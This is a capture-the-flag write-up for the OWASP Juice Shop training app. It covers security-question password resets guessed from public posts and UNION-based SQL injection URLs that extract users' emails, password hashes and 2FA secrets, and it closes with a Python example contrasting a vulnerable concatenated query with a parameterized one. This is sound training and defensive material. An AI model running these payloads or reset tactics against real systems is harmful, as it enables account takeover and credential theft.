Broken Authentication Owasp
I entered "Samuel" as his brother's name. After submitting the request, I received a 200 response, indicating success, and thus I was able to reset Jim's password.
Reset the password of Bjoern's OWASP account via the Forgot Password (Challenge 3)
I entered "bjoern@owasp.org" as his email and found his favorite pet's name, "Zaya," via a Twitter post.
I provided "Zaya" as the answer to the security question, and this successfully allowed me to reset Bjoern's OWASP account password.
Upon finding "chris.pike@juice-sh.op," I applied SQL injection for login bypass, successfully solving this challenge.
I discovered that Bender had a job at the metalworking factory, and I learned about the suicide booths.
Finally, I had a guess that the answer might be 'Stop'n'Drop' based on this information. I entered it as the answer to the security question, and the challenge was solved.
I tried using this payload and it fails with no such column: 2fakey.
http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,2fa,null,null,null,null%20from%20users--
I tried using this payload and it fails with no such column: 2fakey.
http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,2fakey,null,null,null,null%20from%20users--
Finally, I tried this payload and it succeeded with a 200 response, as this column exists!
http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,totpsecret,null,null,null,null%20from%20users--
Payload understanding
1. ')) : The single quote (%27 in the URL) closes the string literal that the search term is placed in, and the two parentheses close the parentheses still open in the original query.
2. union select : Combines the results of two SELECT queries into a single result set; the injected SELECT must return the same number of columns as the original one.
3. null,id,email,password,totpsecret,null,null,null,null : These are the columns I am selecting from the "users" table. Each "null" is a placeholder for a column I am not interested in, so that the column count matches.
4. from users : This specifies the table I am going to retrieve from.
5. -- : The SQL line-comment marker; it comments out the rest of the original query so that the injected statement remains syntactically valid.
In the response from the successful SQL injection payload, I found the entry of user wurstbrot@juice-sh.op with a secret key named 'IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH' for 2FA.
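Why the page's payload works and how the search endpoint should have been written, as an added example that is neither the writeup's nor Juice Shop's own code: Python's standard-library sqlite3 stands in for the server's database, the table layout and the concatenated query are assumptions modelled on a product search, and all data (including the secret) is constructed.

```python
import sqlite3
from urllib.parse import unquote

# Constructed in-memory stand-in for the two tables the writeup touches. The
# 9-column Products layout is an assumption chosen so the page's 9-column UNION lines up.
SCHEMA = """
CREATE TABLE Products (id INTEGER, name TEXT, description TEXT, price REAL,
    deluxePrice REAL, image TEXT, createdAt TEXT, updatedAt TEXT, deletedAt TEXT);
CREATE TABLE Users (id INTEGER, email TEXT, password TEXT, totpSecret TEXT);
INSERT INTO Products VALUES (1, 'Apple Juice', 'Fresh', 1.99, 1.49, 'a.jpg', '', '', NULL);
INSERT INTO Users VALUES (1, 'wurstbrot@juice-sh.op', '<hash>', 'CONSTRUCTED-SECRET');
"""

# The q= parameter from the page's successful request, URL-decoded.
PAYLOAD = unquote("%27))%20union%20select%20null,id,email,password,totpsecret,"
                  "null,null,null,null%20from%20users--")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_search(conn, q):
    """String concatenation (assumed shape): q is parsed as SQL, so the quote
    closes the literal, '))' closes the parentheses and '--' drops the rest."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE '%" + q + "%' OR description LIKE '%"
           + q + "%') AND deletedAt IS NULL) ORDER BY name")
    return conn.execute(sql).fetchall()


def safe_search(conn, q):
    """Bound parameter: the same text is only ever a LIKE pattern, never SQL."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    pattern = "%" + q + "%"
    return conn.execute(sql, (pattern, pattern)).fetchall()


def leaked_emails(rows):
    """Response check: a 'product' whose description slot holds an e-mail
    address came from another table, which is exactly what the writeup spotted."""
    return [r[2] for r in rows if isinstance(r[2], str) and "@" in r[2]]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leaked_emails(vulnerable_search(db, PAYLOAD)))  # ['wurstbrot@juice-sh.op']
    print("parameterized:", safe_search(db, PAYLOAD))  # []
```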